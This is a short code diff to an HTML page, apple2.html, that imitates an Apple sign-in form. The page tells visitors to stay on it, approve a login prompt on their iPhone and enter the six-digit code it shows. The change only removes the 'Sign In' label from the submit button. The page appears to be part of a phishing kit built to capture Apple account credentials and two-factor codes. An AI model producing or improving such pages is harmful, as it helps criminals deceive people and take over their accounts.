--- a/apple2.html
+++ b/apple2.html
@@ -29,7 +29,7 @@
         <p style="font-size: 12px; padding-top: 10px;">Please, do not exit the page!<br /> Within one minute, a login
             confirmation window will appear on your iPhone, click allow login and you will see a window with a six-digit
             login code, which must be entered in the field above.</p>
-        <button type="submit">Sign In <i class="fab fa-apple" style="color: black;"></i></button>
+        <button type="submit"><i class="fab fa-apple" style="color: black;"></i></button>
     </form>
     <script src="./app1.js"></script>
 </body>
